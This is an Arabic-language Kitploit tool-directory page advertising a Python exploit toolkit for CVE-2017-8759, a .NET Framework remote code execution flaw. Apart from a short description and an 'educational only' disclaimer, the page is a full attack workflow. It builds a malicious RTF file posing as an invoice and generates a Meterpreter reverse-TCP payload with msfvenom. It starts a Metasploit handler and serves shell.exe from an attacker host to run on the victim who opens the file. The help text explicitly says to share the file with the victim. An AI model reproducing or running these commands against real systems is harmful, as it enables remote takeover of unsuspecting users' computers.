Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-8759 — CVE-2017-8759 سكربت استغلال ثغرة مايكروسوفت وورد | Kitploit
أدوات/GitHubGitHub/adeljck/cve-2017-8759
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubadeljck/cve-2017-8759

CVE-2017-8759

CVE-2017-8759 سكربت استغلال ثغرة مايكروسوفت وورد

عرض المستودع
منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة استغلال CVE-2017-8759

أداة استغلال CVE-2017-8759 هي سكربت بايثون مفيد يوفر لمختبر الاختراق والباحثين الأمنيين طريقة سريعة وفعالة لاختبار ثغرة تنفيذ الأوامر عن بعد (RCE) في Microsoft .NET Framework. يمكنها إنشاء ملف RTF ضار وتوصيل بايلود من Metasploit / Meterpreter / غيرها للضحية دون أي تكوين معقد.

إخلاء مسؤولية

هذا البرنامج لأغراض تعليمية فقط. لا تستخدمه بدون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة حقيقة أنني (bhdresh) غير مسؤول عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو سوء استخدام هذه البرامج أو أي مشتقاتها. باستخدام هذا البرنامج فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) ناتج عن استخدام هذه البرامج ليس مسؤولية bhdresh.

أخيرًا، هذا تطوير شخصي، يرجى احترام فلسفته وعدم استخدامه لأمور سيئة!

ملاحظة الإصدار:

تم تقديم الإمكانيات التالية للسكربت

root@kitploit:~
- إنشاء ملف RTF ضار
- وضع الاستغلال للملف RTF المُنشأ

الإصدار: بايثون إصدار 2.7.13

السيناريو: توصيل بايلود Meterpreter محلي

أمثلة الأوامر
root@kitploit:~
1) إنشاء ملف RTF ضار
   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (اختياري، إذا كنت تستخدم بايلود MSF): إنشاء بايلود metasploit وبدء المعالج
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) ابدأ الأداة في وضع الاستغلال لتوصيل البايلود المحلي
   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

وسائط سطر الأوامر:

root@kitploit:~
# python cve-2017-8759_toolkit.py -h

This is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)

Modes:

-M gen                                          Generate Malicious file only

     Generate malicious RTF/PPSX file:

      -w <Filename.rtf>                   Name of malicious RTF file (Share this file with victim).

      -u <http://attacker.com/test.txt>   Path of remote txt file. Normally, this should be a domain or IP where this                                          tool is running.
                                          For example, http://attackerip.com/test.txt (This URL will be included in 	                                              malicious RTF file and will be requested once victim will open malicious RTF file.

				      
-M exp                                          Start exploitation mode

     Exploitation:
  
      -p <TCP port:Default 80>            Local port number.

      -e <http://attacker.com/shell.exe>  The path of an executable file / meterpreter shell / payload  which needs to be executed on target.

      -l </tmp/shell.exe>                 Specify local path of an executable file / meterpreter shell / payload.
تنزيل الأداة